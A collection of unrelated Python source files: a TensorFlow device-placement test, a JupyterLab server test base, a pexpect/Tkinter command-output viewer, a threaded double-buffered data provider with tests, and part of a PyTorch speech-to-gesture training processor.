"worker": ["worker0:2222", "worker1:2222", "worker2:2222"]
})
worker_device = "/job:worker/task:0"
ma_coustom = ModelAverageCustomGetter(worker_device=worker_device)
from tensorflow.python.training import device_setter
with tf.device(
tf.train.replica_device_setter(cluster=cluster_spec,
worker_device=worker_device,
ps_device="/job:ps")), \
tf.variable_scope('', custom_getter=ma_coustom):
v = tf.get_variable(initializer=[1, 2], name="v")
w = tf.get_variable(initializer=[2, 1], name='w')
v_g, w_g = ma_coustom._local_2_global[v], ma_coustom._local_2_global[w]
self.assertDeviceEqual("/job:worker/task:0", v.device)
self.assertDeviceEqual("job:ps/task:0", v_g.device)
self.assertDeviceEqual("/job:worker/task:0", w.device)
self.assertDeviceEqual("job:ps/task:1", w_g.device)
if __name__ == '__main__':
tf.test.main()
|
utils.py
|
from binascii import hexlify
import errno
import os
import sys
from os.path import join as pjoin
from tempfile import TemporaryDirectory
from threading import Thread, Event
from unittest.mock import patch
from jupyterlab_server import LabServerApp, LabConfig
from ..servertest import ServerTestBase
from ..server import url_path_join
import jupyter_core
from traitlets.config import Config
from tornado.ioloop import IOLoop
here = os.path.dirname(__file__)
class LabTestBase(ServerTestBase):
Application = LabServerApp
"""The application being tested. Sub-classes should change this."""
@classmethod
def setup_class(cls):
cls.tmp_dir = TemporaryDirectory()
def tmp(*parts):
path = os.path.join(cls.tmp_dir.name, *parts)
try:
os.makedirs(path)
except OSError as e:
if e.errno != errno.EEXIST:
raise
return path
cls.home_dir = tmp('home')
cls.data_dir = tmp('data')
cls.config_dir = tmp('config')
cls.runtime_dir = tmp('runtime')
cls.lab_dir = tmp('lab')
cls.app_settings_dir = tmp('appsettings')
cls.lab_schemas = tmp('labschemas')
cls.lab_settings = tmp('labsettings')
cls.lab_workspaces = tmp('labworkspaces')
cls.env_patch = patch.dict('os.environ', {
'HOME': cls.home_dir,
'PYTHONPATH': os.pathsep.join(sys.path),
'IPYTHONDIR': pjoin(cls.home_dir, '.ipython'),
'JUPYTER_NO_CONFIG': '1', # needed in the future
'JUPYTER_CONFIG_DIR': cls.config_dir,
'JUPYTER_DATA_DIR': cls.data_dir,
'JUPYTER_RUNTIME_DIR': cls.runtime_dir,
'JUPYTERLAB_DIR': cls.lab_dir,
'JUPYTERLAB_SETTINGS_DIR': cls.lab_settings
})
cls.env_patch.start()
cls.lab_config = LabConfig(
app_settings_dir=cls.app_settings_dir,
schemas_dir=cls.lab_schemas,
user_settings_dir=cls.lab_settings,
workspaces_dir=cls.lab_workspaces)
cls.notebook_dir = tmp('notebooks')
cls.path_patch = patch.multiple(
jupyter_core.paths,
SYSTEM_JUPYTER_PATH=[tmp('share', 'jupyter')],
ENV_JUPYTER_PATH=[tmp('env', 'share', 'jupyter')],
SYSTEM_CONFIG_PATH=[tmp('etc', 'jupyter')],
ENV_CONFIG_PATH=[tmp('env', 'etc', 'jupyter')],
)
cls.path_patch.start()
cls.config = cls.config or Config()
cls.config.NotebookNotary.db_file = ':memory:'
cls.token = hexlify(os.urandom(4)).decode('ascii')
started = Event()
def start_thread():
if 'asyncio' in sys.modules:
import asyncio
asyncio.set_event_loop(asyncio.new_event_loop())
app = cls.notebook = cls.Application(
app_dir=cls.lab_dir,
port=cls.port,
port_retries=0,
open_browser=False,
config_dir=cls.config_dir,
data_dir=cls.data_dir,
runtime_dir=cls.runtime_dir,
notebook_dir=cls.notebook_dir,
base_url=cls.url_prefix,
config=cls.config,
allow_root=True,
token=cls.token,
lab_config=cls.lab_config
)
# don't register signal handler during tests
app.init_signal = lambda: None
# clear log handlers and propagate to root for nose to capture it
# needs to be redone after initialize, which reconfigures logging
app.log.propagate = True
app.log.handlers = []
app.initialize(argv=[])
app.log.propagate = True
app.log.handlers = []
loop = IOLoop.current()
loop.add_callback(started.set)
try:
app.start()
finally:
# set the event, so failure to start doesn't cause a hang
started.set()
app.session_manager.close()
cls.notebook_thread = Thread(target=start_thread)
cls.notebook_thread.daemon = True
cls.notebook_thread.start()
started.wait()
cls.wait_until_alive()
class APITester(object):
"""Wrapper for REST API requests"""
url = '/'
def __init__(self, request):
self.request = request
def _req(self, verb, path, body=None):
response = self.request(verb,
url_path_join(self.url, path), data=body)
if 400 <= response.status_code < 600:
try:
response.reason = response.json()['message']
except Exception:
pass
response.raise_for_status()
return response
|
pexpect_runner.py
|
#!/usr/bin/python
import sys
import pexpect
import os
from Tkinter import *
import Pmw
import threading
import signal
import time
import Queue
def sighandler(signum, frame):
# print "Signaled: %d" %signum
if signum == signal.SIGCHLD:
sys.exit(1)
else:
text_queue.put("SIGQUIT")
def process_poller():
# command to run is arguments 2->end
global text
global exitThread
command = " ".join(sys.argv[3:])
print "Running command %s"%command
child = pexpect.spawn(command)
logfd = open(sys.argv[1],'w')
child.logfile = logfd
logfd.write("%s: Running command \"%s\"\n"%(sys.argv[0],command))
time.sleep(2)
while True:
try:
child.expect('\r\n',timeout=1)
if exitThread:
try:
child.kill(signal.SIGINT)
child.wait()
except:
print("KILL")
break
if len(child.before):
text_queue.put(child.before)
# text.appendtext(child.before + "\n")
except pexpect.EOF:
text_queue.put("**EXIT**")
# text.appendtext("**EXIT**")
break
except pexpect.TIMEOUT:
if exitThread:
try:
child.kill(signal.SIGINT)
child.wait()
except:
print("KILL")
break
if len(child.before):
text_queue.put(child.before)
# text.appendtext(child.before + "\n")
def poll_text():
# check queue
try:
while True:
msg = text_queue.get(block = False)
if msg == "SIGQUIT":
root.quit()
return
else:
text.appendtext(msg + "\n")
text_queue.task_done()
except Queue.Empty:
pass
# reschedule
root.after(100,poll_text)
def main(argv=None):
# argument list
# 0 = binary (pexpect_runner.py)
# 1 = log file
# 2 = title for window
# 3... = binary to run
global root
root = Pmw.initialise()
root.title(sys.argv[2])
global text
text = Pmw.ScrolledText(root,hscrollmode="dynamic",vscrollmode="dynamic")
text.pack(expand=1,fill='both')
global exitThread
exitThread = False
global text_queue
text_queue = Queue.Queue()
poller_thread = threading.Thread(target=process_poller)
poller_thread.start()
# register signal handler
signal.signal(signal.SIGINT,sighandler)
signal.signal(signal.SIGTERM,sighandler)
signal.signal(signal.SIGCHLD,sighandler)
root.after(0,poll_text)
root.mainloop()
exitThread = True
# start poller thread
poller_thread.join()
if __name__ == "__main__":
sys.exit(main())
|
buffered_data_provider.py
|
import plotter_controller
import random_data_provider
from threading import Thread, Lock, Condition
import random
import time
class BufferedDataProvider(plotter_controller.StepDataProvider):
# Buffer size is in number of steps
def __init__(self, data_provider, buffer_size=1024):
#Setup buffers
self.read_buffer = []
self.write_buffer = []
self.buffer_size = buffer_size
self.data_provider = data_provider
#Threading init
self.data_loader_thread = Thread(target=self.dataLoaderThread)
self.swap_condition = Condition()
self.data_loader_thread.daemon = True
self.data_loader_thread.start()
def swapBuffers(self):
temp_buffer = self.read_buffer
self.read_buffer = self.write_buffer
self.write_buffer = temp_buffer
def requestSwap(self):
if(len(self.read_buffer) <= 0 and len(self.write_buffer) > 0):
self.swapBuffers()
self.swap_condition.notify_all()
def putStep(self):
self.swap_condition.acquire()
#print("Wait here with ", len(self.write_buffer), self.buffer_size)
while(len(self.write_buffer) == self.buffer_size):
#print("Wait for empty")
self.swap_condition.wait()
#print("Wake for empty")
step = self.data_provider.getStep()
self.write_buffer.append(step)
self.requestSwap()
self.swap_condition.release()
def dataLoaderThread(self):
while(self.data_provider.hasData()):
self.putStep()
def getStep(self):
self.swap_condition.acquire()
self.requestSwap()
#print("sizes",len(self.read_buffer), len(self.write_buffer))
#The two last conditions are strictly speaking not required, but ensures that no strange order has happend emptying the data.
while(len(self.read_buffer) <= 0 and (len(self.write_buffer) > 0 or self.data_provider.hasData())):
#print("Wait for fill")
self.swap_condition.wait()
#print("Wake for fill")
step = self.read_buffer.pop(0)
if(len(self.read_buffer) == 0):
self.requestSwap()
self.swap_condition.release()
return step
def hasData(self):
self.swap_condition.acquire()
has_data = len(self.read_buffer) > 0 or len(self.write_buffer) > 0 or self.data_provider.hasData()
self.swap_condition.release()
return has_data
def runTestWithDataProvider(original_provider, buffered_provider, number_of_data, consume_delay=0, consume_delay_width=0):
do_delay = consume_delay != 0
random.seed(1235)
for i in range(number_of_data):
if(not buffered_provider.hasData()):
raise Exception("Test failed, the provider claimed that data is not accessable")
if(do_delay):
random_time = (consume_delay_width * random.random()) - consume_delay_width
sleep_time = max(0, consume_delay + random_time)
step = buffered_provider.getStep()
correct_step = original_provider.interaction_list.pop(0)
if(step != correct_step):
raise Exception("Test failed as data is not correct compared to reference")
print("%.2f"%(i * 100.0 / number_of_data), end="\r")
if(buffered_provider.hasData()):
raise Exception("The data provider claims it has data when it doesn't")
def testNodelay(buffer_size, number_of_data=10000):
original_provider = random_data_provider.RandomDataProvider(number_of_data=number_of_data, seed=123)
buffered_provider = BufferedDataProvider(original_provider, buffer_size=buffer_size)
runTestWithDataProvider(original_provider, buffered_provider, number_of_data)
def testFasterProvider(buffer_size, number_of_data=10000):
basic_delay = 0.01
basic_delay_width = 0.01
original_provider = random_data_provider.RandomDataProvider(number_of_data=number_of_data, seed=123, delay_time=basic_delay/2, random_delay_variation=basic_delay_width/2)
buffered_provider = BufferedDataProvider(original_provider, buffer_size=buffer_size)
runTestWithDataProvider(original_provider, buffered_provider, number_of_data, consume_delay=basic_delay, consume_delay_width=basic_delay_width)
def testFasterConsumer(buffer_size, number_of_data=10000):
basic_delay = 0.01
basic_delay_width = 0.01
original_provider = random_data_provider.RandomDataProvider(number_of_data=number_of_data, seed=123, delay_time=basic_delay, random_delay_variation=basic_delay_width)
buffered_provider = BufferedDataProvider(original_provider, buffer_size=buffer_size)
runTestWithDataProvider(original_provider, buffered_provider, number_of_data, consume_delay=basic_delay/2, consume_delay_width=basic_delay_width/2)
def testEqualTime(buffer_size, number_of_data=10000):
basic_delay = 0.01
basic_delay_width = 0.01
original_provider = random_data_provider.RandomDataProvider(number_of_data=number_of_data, seed=123, delay_time=basic_delay, random_delay_variation=basic_delay_width)
buffered_provider = BufferedDataProvider(original_provider, buffer_size=buffer_size)
runTestWithDataProvider(original_provider, buffered_provider, number_of_data, consume_delay=basic_delay, consume_delay_width=basic_delay_width)
def run_test():
for buffer_size in [1, 2, 3, 8, 123, 512, 1001]:
print("No delay buffer size %d:"%(buffer_size))
testNodelay(buffer_size)
print("Faster provider buffer size %d:"%(buffer_size))
testFasterProvider(buffer_size)
print("Faster consumer buffer size %d:"%(buffer_size))
testFasterConsumer(buffer_size)
print("Equal time buffer size %d:"%(buffer_size))
testEqualTime(buffer_size)
print("All tests passed!")
if __name__ == "__main__":
run_test()
|
processor_v2_abl_audio.py
|
import datetime
import lmdb
import math
import matplotlib.pyplot as plt
import numpy as np
import os
import pickle
import pyarrow
import python_speech_features as ps
import threading
import time
import torch
import torch.optim as optim
import torch.nn as nn
import torch.nn.functional as F
from librosa.feature import mfcc
from os.path import join as jn
from torchlight.torchlight.io import IO
import utils.common as cmn
from net.embedding_space_evaluator import EmbeddingSpaceEvaluator
from net.ser_att_conv_rnn_v1 import AttConvRNN
from net.multimodal_context_net_v2_abl_audio import PoseGeneratorTriModal as PGT, ConvDiscriminatorTriModal as CDT
from net.multimodal_context_net_v2_abl_audio import PoseGenerator, AffDiscriminator
from utils.average_meter import AverageMeter
from utils.data_preprocessor import DataPreprocessor
from utils.gen_utils import create_video_and_save
from utils import losses
from utils.ted_db_utils import *
torch.manual_seed(1234)
rec_loss = losses.quat_angle_loss
def find_all_substr(a_str, sub):
start = 0
while True:
start = a_str.find(sub, start)
if start == -1:
return
yield start
start += len(sub) # use start += 1 to find overlapping matches
def get_epoch_and_loss(path_to_model_files, epoch='best'):
all_models = os.listdir(path_to_model_files)
if len(all_models) < 2:
return '', None, np.inf
if epoch == 'best':
loss_list = -1. * np.ones(len(all_models))
for i, model in enumerate(all_models):
loss_val = str.split(model, '_')
if len(loss_val) > 1:
loss_list[i] = float(loss_val[3])
if len(loss_list) < 3:
best_model = all_models[np.argwhere(loss_list == min([n for n in loss_list if n > 0]))[0, 0]]
else:
loss_idx = np.argpartition(loss_list, 2)
best_model = all_models[loss_idx[1]]
all_underscores = list(find_all_substr(best_model, '_'))
# return model name, best loss
return best_model, int(best_model[all_underscores[0] + 1:all_underscores[1]]), \
float(best_model[all_underscores[2] + 1:all_underscores[3]])
assert isinstance(epoch, int)
found_model = None
for i, model in enumerate(all_models):
model_epoch = str.split(model, '_')
if len(model_epoch) > 1 and epoch == int(model_epoch[1]):
found_model = model
break
if found_model is None:
return '', None, np.inf
all_underscores = list(find_all_substr(found_model, '_'))
return found_model, int(found_model[all_underscores[0] + 1:all_underscores[1]]), \
float(found_model[all_underscores[2] + 1:all_underscores[3]])
class Processor(object):
"""
Processor for emotive gesture generation
"""
def __init__(self, base_path, args, s2eg_config_args, data_loader, pose_dim, coords,
audio_sr, min_train_epochs=20, zfill=6):
self.device = torch.device('cuda:{}'.format(torch.cuda.current_device())
if torch.cuda.is_available() else 'cpu')
self.base_path = base_path
self.args = args
self.s2eg_config_args = s2eg_config_args
self.data_loader = data_loader
self.result = dict()
self.iter_info = dict()
self.epoch_info = dict()
self.meta_info = dict(epoch=0, iter=0)
self.io = IO(
self.args.work_dir_s2eg,
save_log=self.args.save_log,
print_log=self.args.print_log)
# model
self.pose_dim = pose_dim
self.coords = coords
self.audio_sr = audio_sr
self.time_steps = self.data_loader['train_data_s2eg'].n_poses
self.audio_length = self.data_loader['train_data_s2eg'].expected_audio_length
self.spectrogram_length = self.data_loader['train_data_s2eg'].expected_spectrogram_length
self.mfcc_length = int(np.ceil(self.audio_length / 512))
self.num_mfcc = self.data_loader['train_data_s2eg'].num_mfcc_combined
self.best_s2eg_loss = np.inf
self.best_s2eg_loss_epoch = None
self.s2eg_loss_updated = False
self.min_train_epochs = min_train_epochs
self.zfill = zfill
self.lang_model = self.data_loader['train_data_s2eg'].lang_model
self.train_speaker_model = self.data_loader['train_data_s2eg'].speaker_model
self.val_speaker_model = self.data_loader['val_data_s2eg'].speaker_model
self.test_speaker_model = self.data_loader['test_data_s2eg'].speaker_model
self.trimodal_generator = PGT(self.s2eg_config_args,
pose_dim=self.pose_dim,
n_words=self.lang_model.n_words,
word_embed_size=self.s2eg_config_args.wordembed_dim,
word_embeddings=self.lang_model.word_embedding_weights,
z_obj=self.train_speaker_model)
self.trimodal_discriminator = CDT(self.pose_dim)
self.use_mfcc = False
self.s2eg_generator = PoseGenerator(self.s2eg_config_args,
pose_dim=self.pose_dim,
n_words=self.lang_model.n_words,
word_embed_size=self.s2eg_config_args.wordembed_dim,
word_embeddings=self.lang_model.word_embedding_weights,
mfcc_length=self.mfcc_length,
num_mfcc=self.num_mfcc,
time_steps=self.time_steps,
z_obj=self.train_speaker_model)
# self.s2eg_discriminator = CDT(self.pose_dim)
self.s2eg_discriminator = AffDiscriminator(self.pose_dim)
self.evaluator_trimodal = EmbeddingSpaceEvaluator(self.s2eg_config_args, self.pose_dim,
self.lang_model, self.device)
self.evaluator = EmbeddingSpaceEvaluator(self.s2eg_config_args, self.pose_dim,
self.lang_model, self.device)
if self.args.use_multiple_gpus and torch.cuda.device_count() > 1:
self.args.batch_size *= torch.cuda.device_count()
self.trimodal_generator = nn.DataParallel(self.trimodal_generator)
self.trimodal_discriminator = nn.DataParallel(self.trimodal_discriminator)
self.s2eg_generator = nn.DataParallel(self.s2eg_generator)
self.s2eg_discriminator = nn.DataParallel(self.s2eg_discriminator)
else:
self.trimodal_generator.to(self.device)
self.trimodal_discriminator.to(self.device)
self.s2eg_generator.to(self.device)
self.s2eg_discriminator.to(self.device)
npz_path = jn(self.args.data_path, self.args.dataset_s2ag, 'npz')
os.makedirs(npz_path, exist_ok=True)
self.num_test_samples = self.data_loader['test_data_s2ag'].n_samples
if self.args.train_s2ag:
self.num_train_samples = self.data_loader['train_data_s2ag'].n_samples
self.num_val_samples = self.data_loader['val_data_s2ag'].n_samples
self.num_total_samples = self.num_train_samples + self.num_val_samples + self.num_test_samples
print('Total s2ag training data:\t\t{:>6} ({:.2f}%)'.format(
self.num_train_samples, 100. * self.num_train_samples / self.num_total_samples))
print('Training s2ag with batch size:\t{:>6}'.format(self.args.batch_size))
train_dir_name = jn(npz_path, 'train')
if not os.path.exists(train_dir_name):
self.save_cache('train', train_dir_name)
self.load_cache('train', train_dir_name)
print('Total s2ag validation data:\t\t{:>6} ({:.2f}%)'.format(
self.num_val_samples, 100. * self.num_val_samples / self.num_total_samples))
val_dir_name = jn(npz_path, 'val')
if not os.path.exists(val_dir_name):
self.save_cache('val', val_dir_name)
self.load_cache('val', val_dir_name)
else:
self.train_samples = None
self.val_samples = None
self.num_total_samples = self.num_test_samples
print('Total s2ag testing data:\t\t{:>6} ({:.2f}%)'.format(
self.num_test_samples, 100. * self.num_test_samples / self.num_total_samples))
test_dir_name = jn(npz_path, 'test')
if not os.path.exists(test_dir_name):
self.save_cache('test', test_dir_name)
self.lr_s2eg_gen = self.s2eg_config_args.learning_rate
self.lr_s2eg_dis = self.s2eg_config_args.learning_rate * self.s2eg_config_args.discriminator_lr_weight
# s2eg optimizers
self.s2eg_gen_optimizer = optim.Adam(self.s2eg_generator.parameters(),
lr=self.lr_s2eg_gen, betas=(0.5, 0.999))
self.s2eg_dis_optimizer = torch.optim.Adam(
self.s2eg_discriminator.parameters(),
lr=self.lr_s2eg_dis,
betas=(0.5, 0.999))
def load_cache(self, part, dir_name, load_full=True):
print('Loading {} cache'.format(part), end='')
if load_full:
start_time = time.time()
npz = np.load(jn(dir_name, '../full', part + '.npz'), allow_pickle=True)
samples_dict = {'extended_word_seq': npz['extended_word_seq'],
'vec_seq': npz['vec_seq'],
'audio': npz['audio'],
'audio_max': npz['audio_max'],
'mfcc_features': npz['mfcc_features'].astype(np.float16),
'vid_indices': npz['vid_indices']
}
if part == 'train':
self.train_samples = samples_dict
elif part == 'val':
self.val_samples = samples_dict
elif part == 'test':
self.test_samples = samples_dict
print(' took {:>6} seconds.'.format(int(np.ceil(time.time() - start_time))))
else:
num_samples = self.num_train_samples if part == 'train' else (self.num_val_samples if part == 'val' else self.num_test_samples)
samples_dict = {'extended_word_seq': [],
'vec_seq': [],
'audio': [],
'audio_max': [],
'mfcc_features': [],
'vid_indices': []}
for k in range(num_samples):
start_time = time.time()
npz = np.load(jn(dir_name, str(k).zfill(6) + '.npz'), allow_pickle=True)
samples_dict['extended_word_seq'].append(npz['extended_word_seq'])
samples_dict['vec_seq'].append(npz['vec_seq'])
samples_dict['audio'].append(npz['audio'])
samples_dict['audio_max'].append(npz['audio_max'])
samples_dict['mfcc_features'].append(npz['mfcc_features'].astype(np.float16))
samples_dict['vid_indices'].append(npz['vid_indices'])
time_taken = time.time() - start_time
time_remaining = np.ceil((num_samples - k - 1) * time_taken)
print('\rLoading {} cache {:>6}/{}, estimated time remaining {}.'.format(part, k + 1, num_samples,
str(datetime.timedelta(seconds=time_remaining))), end='')
for dict_key in samples_dict.keys():
samples_dict[dict_key] = np.stack(samples_dict[dict_key])
if part == 'train':
self.train_samples = samples_dict
elif part == 'val':
self.val_samples = samples_dict
elif part == 'test':
self.test_samples = samples_dict
print(' Completed.')
def save_cache(self, part, dir_name):
data_s2ag = self.data_loader['{}_data_s2ag'.format(part)]
num_samples = self.num_train_samples if part == 'train' else (self.num_val_samples if part == 'val' else self.num_test_samples)
speaker_model = self.train_speaker_model if part == 'train' else (self.val_speaker_model if part == 'val' else self.test_speaker_model)
extended_word_seq_all = np.zeros((num_samples, self.time_steps), dtype=np.int64)
vec_seq_all = np.zeros((num_samples, self.time_steps, self.pose_dim))
audio_all = np.zeros((num_samples, self.audio_length), dtype=np.int16)
audio_max_all = np.zeros(num_samples)
mfcc_features_all = np.zeros((num_samples, self.num_mfcc, self.mfcc_length))
vid_indices_all = np.zeros(num_samples, dtype=np.int64)
print('Caching {} data {:>6}/{}.'.format(part, 0, num_samples), end='')
for k in range(num_samples):
with data_s2ag.lmdb_env.begin(write=False) as txn:
key = '{:010}'.format(k).encode('ascii')
sample = txn.get(key)
sample = pyarrow.deserialize(sample)
word_seq, pose_seq, vec_seq, audio, spectrogram, mfcc_features, aux_info = sample
# with data_s2ag.lmdb_env.begin(write=False) as txn:
# key = '{:010}'.format(k).encode('ascii')
# sample = txn.get(key)
# sample = pyarrow.deserialize(sample)
# word_seq, pose_seq, vec_seq, audio, spectrogram, mfcc_features, aux_info = sample
duration = aux_info['end_time'] - aux_info['start_time']
audio_max_all[k] = np.max(np.abs(audio))
do_clipping = True
if do_clipping:
sample_end_time = aux_info['start_time'] + duration * data_s2ag.n_poses / vec_seq.shape[0]
audio = make_audio_fixed_length(audio, self.audio_length)
mfcc_features = mfcc_features[:, 0:self.mfcc_length]
vec_seq = vec_seq[0:data_s2ag.n_poses]
else:
sample_end_time = None
# to tensors
word_seq_tensor = Processor.words_to_tensor(data_s2ag.lang_model, word_seq, sample_end_time)
extended_word_seq = Processor.extend_word_seq(data_s2ag.n_poses, data_s2ag.lang_model,
data_s2ag.remove_word_timing, word_seq,
aux_info, sample_end_time).detach().cpu().numpy()
vec_seq = torch.from_numpy(vec_seq).reshape((vec_seq.shape[0], -1)).float().detach().cpu().numpy()
extended_word_seq_all[k] = extended_word_seq
vec_seq_all[k] = vec_seq
audio_all[k] = np.int16(audio / audio_max_all[k] * 32767)
mfcc_features_all[k] = mfcc_features
vid_indices_all[k] = speaker_model.word2index[aux_info['vid']]
np.savez_compressed(jn(dir_name, part, str(k).zfill(6) + '.npz'),
extended_word_seq=extended_word_seq,
vec_seq=vec_seq,
audio=np.int16(audio / audio_max_all[k] * 32767),
audio_max=audio_max_all[k],
mfcc_features=mfcc_features,
vid_indices=vid_indices_all[k])
print('\rCaching {} data {:>6}/{}.'.format(part, k + 1, num_samples), end='')
print('\t Storing full cache', end='')
full_cache_path = jn(dir_name, '../full')
os.makedirs(full_cache_path, exist_ok=True)
np.savez_compressed(jn(full_cache_path, part + '.npz'),
extended_word_seq=extended_word_seq_all,
vec_seq=vec_seq_all, audio=audio_all, audio_max=audio_max_all,
mfcc_features=mfcc_features_all,
vid_indices=vid_indices_all)
print(' done.')
def process_data(self, data, poses, quat, trans, affs):
data = data.float().to(self.device)
poses = poses.float().to(self.device)
quat = quat.float().to(self.device)
trans = trans.float().to(self.device)
affs = affs.float().to(self.device)
return data, poses, quat, trans, affs
def load_model_at_epoch(self, epoch='best'):
model_name, self.best_s2eg_loss_epoch, self.best_s2eg_loss = \
get_epoch_and_loss(self.args.work_dir_s2eg, epoch=epoch)
model_found = False
try:
loaded_vars = torch.load(jn(self.args.work_dir_s2eg, model_name))
self.s2eg_generator.load_state_dict(loaded_vars['gen_model_dict'])
self.s2eg_discriminator.load_state_dict(loaded_vars['dis_model_dict'])
model_found = True
except (FileNotFoundError, IsADirectoryError):
if epoch == 'best':
print('Warning! No saved model found.')
else:
print('Warning! No saved model found at epoch {}.'.format(epoch))
return model_found
def adjust_lr_s2eg(self):
self.lr_s2eg_gen = self.lr_s2eg_gen * self.args.lr_s2eg_decay
for param_group in self.s2eg_gen_optimizer.param_groups:
param_group['lr'] = self.lr_s2eg_gen
self.lr_s2eg_dis = self.lr_s2eg_dis * self.args.lr_s2eg_decay
for param_group in self.s2eg_dis_optimizer.param_groups:
param_group['lr'] = self.lr_s2eg_dis
def show_epoch_info(self):
best_metrics = [self.best_s2eg_loss]
print_epochs = [self.best_s2eg_loss_epoch
if self.best_s2eg_loss_epoch is not None else 0] * len(best_metrics)
i = 0
for k, v in self.epoch_info.items():
self.io.print_log('\t{}: {}. Best so far: {:.4f} (epoch: {:d}).'.
format(k, v, best_metrics[i], print_epochs[i]))
i += 1
if self.args.pavi_log:
self.io.log('train', self.meta_info['iter'], self.epoch_info)
def show_iter_info(self):
if self.meta_info['iter'] % self.args.log_interval == 0:
info = '\tIter {} Done.'.format(self.meta_info['iter'])
for k, v in self.iter_info.items():
if isinstance(v, float):
info = info + ' | {}: {:.4f}'.format(k, v)
else:
info = info + ' | {}: {}'.format(k, v)
self.io.print_log(info)
if self.args.pavi_log:
self.io.log('train', self.meta_info['iter'], self.iter_info)
def count_parameters(self):
return sum(p.numel() for p in self.s2eg_generator.parameters() if p.requires_grad)
@staticmethod
def extend_word_seq(n_frames, lang, remove_word_timing, words, aux_info, end_time=None):
if end_time is None:
end_time = aux_info['end_time']
frame_duration = (end_time - aux_info['start_time']) / n_frames
extended_word_indices = np.zeros(n_frames) # zero is the index of padding token
if remove_word_timing:
n_words = 0
for word in words:
idx = max(0, int(np.floor((word[1] - aux_info['start_time']) / frame_duration)))
if idx < n_frames:
n_words += 1
space = int(n_frames / (n_words + 1))
for word_idx in range(n_words):
idx = (word_idx + 1) * space
extended_word_indices[idx] = lang.get_word_index(words[word_idx][0])
else:
prev_idx = 0
for word in words:
idx = max(0, int(np.floor((word[1] - aux_info['start_time']) / frame_duration)))
if idx < n_frames:
extended_word_indices[idx] = lang.get_word_index(word[0])
# extended_word_indices[prev_idx:idx+1] = lang.get_word_index(word[0])
prev_idx = idx
return torch.Tensor(extended_word_indices).long()
@staticmethod
def words_to_tensor(lang, words, end_time=None):
indexes = [lang.SOS_token]
for word in words:
if end_time is not None and word[1] > end_time:
break
indexes.append(lang.get_word_index(word[0]))
indexes.append(lang.EOS_token)
return torch.Tensor(indexes).long()
def yield_batch_old(self, train):
batch_word_seq_tensor = torch.zeros((self.args.batch_size, self.time_steps)).long().to(self.device)
batch_word_seq_lengths = torch.zeros(self.args.batch_size).long().to(self.device)
batch_extended_word_seq = torch.zeros((self.args.batch_size, self.time_steps)).long().to(self.device)
batch_pose_seq = torch.zeros((self.args.batch_size, self.time_steps,
self.pose_dim + self.coords)).float().to(self.device)
batch_vec_seq = torch.zeros((self.args.batch_size, self.time_steps, self.pose_dim)).float().to(self.device)
batch_audio = torch.zeros((self.args.batch_size, self.audio_length)).float().to(self.device)
batch_spectrogram = torch.zeros((self.args.batch_size, 128,
self.spectrogram_length)).float().to(self.device)
batch_mfcc = torch.zeros((self.args.batch_size, self.num_mfcc,
self.mfcc_length)).float().to(self.device)
batch_vid_indices = torch.zeros(self.args.batch_size).long().to(self.device)
if train:
data_s2eg = self.data_loader['train_data_s2eg']
num_data = self.num_train_samples
else:
data_s2eg = self.data_loader['val_data_s2eg']
num_data = self.num_val_samples
pseudo_passes = (num_data + self.args.batch_size - 1) // self.args.batch_size
prob_dist = np.ones(num_data) / float(num_data)
# def load_from_txn(_txn, _i, _k):
# key = '{:010}'.format(_k).encode('ascii')
# sample = _txn.get(key)
# sample = pyarrow.deserialize(sample)
# word_seq, pose_seq, vec_seq, audio, spectrogram, mfcc_features, aux_info = sample
#
# # vid_name = sample[-1]['vid']
# # clip_start = str(sample[-1]['start_time'])
# # clip_end = str(sample[-1]['end_time'])
#
# duration = aux_info['end_time'] - aux_info['start_time']
# do_clipping = True
#
# if do_clipping:
# sample_end_time = aux_info['start_time'] + duration * data_s2eg.n_poses / vec_seq.shape[0]
# audio = make_audio_fixed_length(audio, self.audio_length)
# spectrogram = spectrogram[:, 0:self.spectrogram_length]
# mfcc_features = mfcc_features[:, 0:self.mfcc_length]
# vec_seq = vec_seq[0:data_s2eg.n_poses]
# pose_seq = pose_seq[0:data_s2eg.n_poses]
# else:
# sample_end_time = None
#
# # to tensors
# word_seq_tensor = Processor.words_to_tensor(data_s2eg.lang_model, word_seq, sample_end_time)
# extended_word_seq = Processor.extend_word_seq(data_s2eg.n_poses, data_s2eg.lang_model,
# data_s2eg.remove_word_timing, word_seq,
# aux_info, sample_end_time)
# vec_seq = torch.from_numpy(vec_seq).reshape((vec_seq.shape[0], -1)).float()
# pose_seq = torch.from_numpy(pose_seq).reshape((pose_seq.shape[0], -1)).float()
# # scaled_audio = np.int16(audio / np.max(np.abs(audio)) * self.audio_length)
# mfcc_features = torch.from_numpy(mfcc_features).float()
# audio = torch.from_numpy(audio).float()
# spectrogram = torch.from_numpy(spectrogram)
#
# batch_word_seq_tensor[_i, :len(word_seq_tensor)] = word_seq_tensor
# batch_word_seq_lengths[_i] = len(word_seq_tensor)
# batch_extended_word_seq[_i] = extended_word_seq
# batch_pose_seq[_i] = pose_seq
# batch_vec_seq[_i] = vec_seq
# batch_audio[_i] = audio
# batch_spectrogram[_i] = spectrogram
# batch_mfcc[_i] = mfcc_features
# # speaker input
# if train:
# if self.train_speaker_model and self.train_speaker_model.__class__.__name__ == 'Vocab':
# batch_vid_indices[_i] = \
# torch.LongTensor([self.train_speaker_model.word2index[aux_info['vid']]])
# else:
# if self.val_speaker_model and self.val_speaker_model.__class__.__name__ == 'Vocab':
# batch_vid_indices[_i] = \
# torch.LongTensor([self.val_speaker_model.word2index[aux_info['vid']]])
for p in range(pseudo_passes):
rand_keys = np.random.choice(num_data, size=self.args.batch_size, replace=True, p=prob_dist)
for i, k in enumerate(rand_keys):
if train:
word_seq = self.train_samples['word_seq'].item()[str(k).zfill(6)]
pose_seq = self.train_samples['pose_seq'][k]
vec_seq = self.train_samples['vec_seq'][k]
audio = self.train_samples['audio'][k] / 32767 * self.train_samples['audio_max'][k]
mfcc_features = self.train_samples['mfcc_features'][k]
aux_info = self.train_samples['aux_info'].item()[str(k).zfill(6)]
else:
word_seq = self.val_samples['word_seq'].item()[str(k).zfill(6)]
pose_seq = self.val_samples['pose_seq'][k]
vec_seq = self.val_samples['vec_seq'][k]
audio = self.val_samples['audio'][k] / 32767 * self.val_samples['audio_max'][k]
mfcc_features = self.val_samples['mfcc_features'][k]
aux_info = self.val_samples['aux_info'].item()[str(k).zfill(6)]
duration = aux_info['end_time'] - aux_info['start_time']
do_clipping = True
if do_clipping:
sample_end_time = aux_info['start_time'] + duration * data_s2eg.n_poses / vec_seq.shape[0]
audio = make_audio_fixed_length(audio, self.audio_length)
